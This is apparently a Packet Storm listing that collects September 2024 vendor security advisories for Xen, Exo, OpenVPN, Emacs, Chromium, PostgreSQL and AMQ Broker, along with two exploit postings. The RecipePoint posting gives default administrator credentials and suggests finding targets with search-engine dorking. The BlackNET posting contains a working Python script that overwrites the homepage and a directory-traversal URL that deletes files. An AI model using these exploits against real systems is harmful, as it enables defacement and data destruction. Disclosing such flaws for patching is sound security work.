Gentoo Linux Security Advisory 202409-10 - Multiple vulnerabilities have been discovered in Xen, the worst of which could lead to privilege escalation. Versions greater than or equal to 4.17.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Xen: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #918669, #921355, #923741, #928620, #929038  
       ID: 202409-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Xen, the worst of which  
could lead to privilege escalation.

Background  
==========

Xen is a bare-metal hypervisor.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-emulation/xen  < 4.17.4      >= 4.17.4

Description  
===========

Multiple vulnerabilities have been discovered in Xen. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Xen users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.17.4"

References  
==========

[ 1 ] CVE-2022-4949  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4949  
[ 2 ] CVE-2022-42336  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42336  
[ 3 ] CVE-2023-28746  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28746  
[ 4 ] CVE-2023-34319  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34319  
[ 5 ] CVE-2023-34320  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34320  
[ 6 ] CVE-2023-34321  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34321  
[ 7 ] CVE-2023-34322  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34322  
[ 8 ] CVE-2023-34323  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34323  
[ 9 ] CVE-2023-34324  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34324  
[ 10 ] CVE-2023-34325  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34325  
[ 11 ] CVE-2023-34327  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34327  
[ 12 ] CVE-2023-34328  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34328  
[ 13 ] CVE-2023-46835  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46835  
[ 14 ] CVE-2023-46836  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46836  
[ 15 ] CVE-2023-46837  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46837  
[ 16 ] CVE-2023-46839  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46839  
[ 17 ] CVE-2023-46840  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46840  
[ 18 ] CVE-2023-46841  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46841  
[ 19 ] CVE-2023-46842  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46842  
[ 20 ] CVE-2024-2193  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2193  
[ 21 ] CVE-2024-31142  
      https://nvd.nist.gov/vuln/detail/CVE-2024-31142  
[ 22 ] XSA-431  
      https://xenbits.xen.org/xsa/advisory-431.html  
[ 23 ] XSA-432  
      https://xenbits.xen.org/xsa/advisory-432.html  
[ 24 ] XSA-436  
      https://xenbits.xen.org/xsa/advisory-436.html  
[ 25 ] XSA-437  
      https://xenbits.xen.org/xsa/advisory-437.html  
[ 26 ] XSA-438  
      https://xenbits.xen.org/xsa/advisory-438.html  
[ 27 ] XSA-439  
      https://xenbits.xen.org/xsa/advisory-439.html  
[ 28 ] XSA-440  
      https://xenbits.xen.org/xsa/advisory-440.html  
[ 29 ] XSA-441  
      https://xenbits.xen.org/xsa/advisory-441.html  
[ 30 ] XSA-442  
      https://xenbits.xen.org/xsa/advisory-442.html  
[ 31 ] XSA-447  
      https://xenbits.xen.org/xsa/advisory-447.html  
[ 32 ] XSA-449  
      https://xenbits.xen.org/xsa/advisory-449.html  
[ 33 ] XSA-450  
      https://xenbits.xen.org/xsa/advisory-450.html  
[ 34 ] XSA-451  
      https://xenbits.xen.org/xsa/advisory-451.html  
[ 35 ] XSA-452  
      https://xenbits.xen.org/xsa/advisory-452.html  
[ 36 ] XSA-453  
      https://xenbits.xen.org/xsa/advisory-453.html  
[ 37 ] XSA-454  
      https://xenbits.xen.org/xsa/advisory-454.html  
[ 38 ] XSA-455  
      https://xenbits.xen.org/xsa/advisory-455.html

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-10

Gentoo Linux Security Advisory 202409-9 - A vulnerability has been discovered in Exo, which can lead to arbitrary code execution. Versions greater than or equal to 4.17.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Exo: Arbitrary Code Execution  
     Date: September 22, 2024  
     Bugs: #851201  
       ID: 202409-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Exo, which can lead to arbitrary  
code execution.

Background  
==========

Exo is an Xfce library targeted at application development, originally  
developed by os-cillation. It contains various custom widgets and APIs  
extending the functionality of GLib and GTK. It also has some helper  
applications that are used throughout the entire Xfce desktop to manage  
preferred applications and edit .desktop files.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
xfce-base/exo  < 4.17.2      >= 4.17.2

Description  
===========

A vulnerability has been discovered in Exo. Please review the CVE  
identifiers referenced below for details.

Impact  
======

Exo executes remote desktop files which may lead to unexpected arbitrary  
code execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Exo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=xfce-base/exo-4.17.2"

References  
==========

[ 1 ] CVE-2022-32278  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32278

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-09

Gentoo Linux Security Advisory 202409-8 - Multiple vulnerabilities have been discovered in OpenVPN, the worst of which could lead to information disclosure. Versions greater than or equal to 2.6.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: OpenVPN: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #835514, #917272  
       ID: 202409-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in OpenVPN, the worst of  
which could lead to information disclosure.

Background  
==========

OpenVPN is a multi-platform, full-featured SSL VPN solution.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-vpn/openvpn  < 2.6.7       >= 2.6.7

Description  
===========

Multiple vulnerabilities have been discovered in OpenVPN. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All OpenVPN users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-vpn/openvpn-2.6.7"

References  
==========

[ 1 ] CVE-2022-0547  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0547  
[ 2 ] CVE-2023-46849  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46849  
[ 3 ] CVE-2023-46850  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46850

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-08

RecipePoint version 1.9 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : RecipePoint 1.9 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/recipepoint/                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/recipepoint/adminGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

RecipePoint 1.9 Insecure Settings

Ubuntu Security Notice 7027-1 - It was discovered that Emacs incorrectly handled input sanitization. An attacker could possibly use this issue to execute arbitrary commands. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. Xi Lu discovered that Emacs incorrectly handled input sanitization. An attacker could possibly use this issue to execute arbitrary commands. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-7027-1  
September 19, 2024

emacs, emacs24, emacs25 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Emacs.

Software Description:  
- emacs: GNU Emacs editor (metapackage)  
- emacs25: GNU Emacs editor (with GTK+ GUI support)  
- emacs24: GNU Emacs editor

Details:

It was discovered that Emacs incorrectly handled input sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04  
LTS. (CVE-2022-45939)

Xi Lu discovered that Emacs incorrectly handled input sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS  
and Ubuntu 22.04 LTS. (CVE-2022-48337)

Xi Lu discovered that Emacs incorrectly handled input sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 22.04 LTS. (CVE-2022-48338)

Xi Lu discovered that Emacs incorrectly handled input sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04  
LTS. (CVE-2022-48339)

It was discovered that Emacs incorrectly handled filename sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04  
LTS. (CVE-2023-28617)

It was discovered that Emacs incorrectly handled certain crafted files. An  
attacker could possibly use this issue to crash the program, resulting in  
a denial of service. This issue only affected Ubuntu 16.04 LTS, Ubuntu  
18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2024-30203,  
CVE-2024-30204, CVE-2024-30205)

It was discovered that Emacs incorrectly handled certain crafted files. An  
attacker could possibly use this issue to execute arbitrary commands.  
(CVE-2024-39331)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   emacs                           1:29.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-bin-common                1:29.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-common                    1:29.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-el                        1:29.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro

Ubuntu 22.04 LTS  
   emacs                           1:27.1+1-3ubuntu5.2  
   emacs-bin-common                1:27.1+1-3ubuntu5.2  
   emacs-common                    1:27.1+1-3ubuntu5.2  
   emacs-el                        1:27.1+1-3ubuntu5.2

Ubuntu 20.04 LTS  
   emacs                           1:26.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-bin-common                1:26.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-common                    1:26.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-el                        1:26.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   emacs25                         25.2+1-6ubuntu0.1~esm2  
                                   Available with Ubuntu Pro  
   emacs25-bin-common              25.2+1-6ubuntu0.1~esm2  
                                   Available with Ubuntu Pro  
   emacs25-common                  25.2+1-6ubuntu0.1~esm2  
                                   Available with Ubuntu Pro  
   emacs25-el                      25.2+1-6ubuntu0.1~esm2  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   emacs24                         24.5+1-6ubuntu1.1+esm4  
                                   Available with Ubuntu Pro  
   emacs24-bin-common              24.5+1-6ubuntu1.1+esm4  
                                   Available with Ubuntu Pro  
   emacs24-common                  24.5+1-6ubuntu1.1+esm4  
                                   Available with Ubuntu Pro  
   emacs24-el                      24.5+1-6ubuntu1.1+esm4  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-7027-1  
   CVE-2022-45939, CVE-2022-48337, CVE-2022-48338, CVE-2022-48339,  
   CVE-2023-28617, CVE-2024-30203, CVE-2024-30204, CVE-2024-30205,  
   CVE-2024-39331,https://launchpad.net/bugs/2070418

Package Information:  
   https://launchpad.net/ubuntu/+source/emacs/1:27.1+1-3ubuntu5.2

Ubuntu Security Notice USN-7027-1

Debian Linux Security Advisory 5773-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5773-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonSeptember 19, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-8904 CVE-2024-8905 CVE-2024-8906 CVE-2024-8907                  CVE-2024-8908 CVE-2024-8909Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 129.0.6668.58-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmbsT+kACgkQZF0CR8NudjcBZxAAr/rpFak7qXGy0AqnX3BLhQEpL3h/hsb4sa4OvOVnsENKrGNgg6+3FNDH8kVjz/IPo6BNKoPa0WFZoq5ENwm9ZkpjToEWM5tRWwqxQyhuZ6n8WzNljc4p5d17k2e0VtPbBR6Z8ICoNhu8iEaX1r2rqqfUciMd6G42+sUPEUkj+We9YWrjt00+nPA9ZGdG9AYml5Zu5+jG5OJJtT9x2I9l1NPbPb8RB5VlGVSyn2lgbr5moLc4t7dbK8LZPQmtjvFpCtkAmcj+bedAGXBio03vJTQJpfednmAOzpZbl1oWoO4opDhRJxPc7MUG/1wWKK+k7e2NR/7TYwSMrKm7fM9tlNTx0Zvzi86Nlrqhx6y6PCdXB1RjaSqtAk732bSIAD/eULqRw0ZeJfUruzUAOmreX1E6JeLbsRUbc6R5pjn9GauVNKcfIxVqXqhf/XcrpUpEqrZ9K71zc2SFQUCC5qxW5rANdZhYm3FV4r9NfTPurEcdDSSr6wZTOfc1Rw1GN6VdX3YLPHEfRvX10RmipzaoMleeHAsSQUF9SpQ9O+m8Ckd1ReZAoJyGXU6wtEQ67sNKNYzkxHL4/H6CE6Fg/i610vXhydqd8Y6b7Sg0CiKjwD+UdaqggoiqMMg+32woZxugNYGC1FqYqoHmA/V2QCZq/pYqUS6x5qHjSUkmPvwLJrU==vXjE-----END PGP SIGNATURE-----

Debian Security Advisory 5773-1

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

OpenSSH 9.9p1

Ubuntu Security Notice 6968-2 - USN-6968-1 fixed CVE-2024-7348 in PostgreSQL-12, PostgreSQL-14, and PostgreSQL-16 This update provides the corresponding updates for PostgreSQL-9.5 in Ubuntu 16.04 LTS. Noah Misch discovered that PostgreSQL incorrectly handled certain SQL objects. An attacker could possibly use this issue to execute arbitrary SQL functions as the superuser.

==========================================================================  
Ubuntu Security Notice USN-6968-2  
September 19, 2024

postgresql-9.5 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS

Summary:

PostgreSQL could execute arbitrary SQL functions as the superuser  
if it received a specially crafted SQL object.

Software Description:  
- postgresql-9.5: Object-relational SQL database

Details:

USN-6968-1 fixed CVE-2024-7348 in PostgreSQL-12, PostgreSQL-14, and  
PostgreSQL-16

This update provides the corresponding updates for PostgreSQL-9.5 in  
Ubuntu 16.04 LTS.

Original advisory details:

Noah Misch discovered that PostgreSQL incorrectly handled certain  
SQL objects. An attacker could possibly use this issue to execute  
arbitrary SQL functions as the superuser.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS  
postgresql-9.5 9.5.25-0ubuntu0.16.04.1+esm8  
Available with Ubuntu Pro  
postgresql-client-9.5 9.5.25-0ubuntu0.16.04.1+esm8  
Available with Ubuntu Pro

After a standard system update you need to restart PostgreSQL to  
make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6968-2  
https://ubuntu.com/security/notices/USN-6968-1  
CVE-2024-7348

Ubuntu Security Notice USN-6968-2

BlackNET version 3.7.0.0 appears to allow unauthenticated access to modify data and suffers from arbitrary file deletion and directory traversal vulnerabilities while authenticated.

    # Exploit Title: BlackNET - Multiple Vulnerabilities# Exploit Author: bRpsd# Date: 20/09/2024# Vendor Homepage: https://github.com/AndroVirus# Software Link: https://github.com/AndroVirus/BlackNET/# Version: v3.7.0.0# Tested on: MacOS - Xampp# CVE: NAimport requests# Define the target URL for the POST requestpost_url = "http://localhost/x/BlackNET/BlackNET%20Panel/post.php"# Defaces the homepagepayload = "Nothing to see here."data = {    'folder_name': 'www',  # this can create any folder on the server    'file_name': 'index.html',  # Name of the file to be created    'data': payload  # The payload being tested}# Send the POST requestresponse = requests.post(post_url, data=data)# Check the responseif response.status_code == 200:    print("Request successful. Check if 'file' was created.")else:    print(f"Request failed with status code: {response.status_code}")    # Vulnerable code: /BlackNET/BlackNET%20Panel/post.php# header('Content-type: text/html; charset=utf-8');## require_once 'config/config.php';# require_once APP_PATH . 'classes/POST.php';## if ($_SERVER['REQUEST_METHOD'] == "POST") {#  $POST = new BlackNET\POST();# $folder_name = isset($_POST['folder_name']) && $_POST['folder_name'] != "" ? $_POST['folder_name'] : 'www';#    $file_name = isset($_POST['file_name']) ? $_POST['file_name'] : "unknown.txt";##   $data = $POST->sanitize($_POST['data']);##  $POST->prepare($folder_name, $file_name, $data);## $POST->write();   ############################################################################################# Arbitrary File Deletion & Directory Traversal [Authenticated]# File: rmfile.php# Parameter: fname# Vul Code:#<?php# require_once 'session.php';#$msg = "";#$id = "";#if ($_SERVER['REQUEST_METHOD'] == "POST") {#    $files = $_POST['file'];#    $vicid = $utils->sanitize($_POST['vicid']);#    if ($auth->checkToken($_POST['csrf'], $_SESSION['csrf'])) {#        foreach ($files as $file) {#if (strpos($file, "../")) {#                $id = $vicid;#                $msg = "error";#            }#            $filename = $utils->sanitize($file);#            $real_path = realpath("upload" . "/" . $vicid . "/" . $filename);#            if (file_exists($real_path)) {#                unlink($real_path);### Proof Of Concept:# http://localhost/x/BlackNET/BlackNET%20Panel/rmfile.php?fname=../favico.png&vicid=&csrf=95a6ae14d491e482b4370da1fd74f69891058f12472e6510e373889d99d84c3c

BlackNET 3.7.0.0 Missing Authentication / File Deletion / Traversal

Red Hat Security Advisory 2024-6893-03 - Red Hat AMQ Broker 7.12.0 is now available from the Red Hat Customer Portal. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6893.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat AMQ Broker 7.12.0 release and security updateAdvisory ID:        RHSA-2024:6893-03Product:            Red Hat JBoss AMQAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6893Issue date:         2024-09-20Revision:           03CVE Names:          CVE-2023-34455====================================================================Summary: Red Hat AMQ Broker 7.12.0 is now available from the Red Hat Customer Portal.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms.This release of Red Hat AMQ Broker 7.12.0 includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.Security Fix(es):* (CVE-2023-34455) snappy-java: Unchecked chunk length leads to DoS* (CVE-2023-35116) jackson-databind: denial of service via cylic dependenciesFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-34455References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.12.0https://docs.redhat.com/en/documentation/red_hat_amq_broker/7.12https://bugzilla.redhat.com/show_bug.cgi?id=2215214https://bugzilla.redhat.com/show_bug.cgi?id=2215445

Source

Packet Storm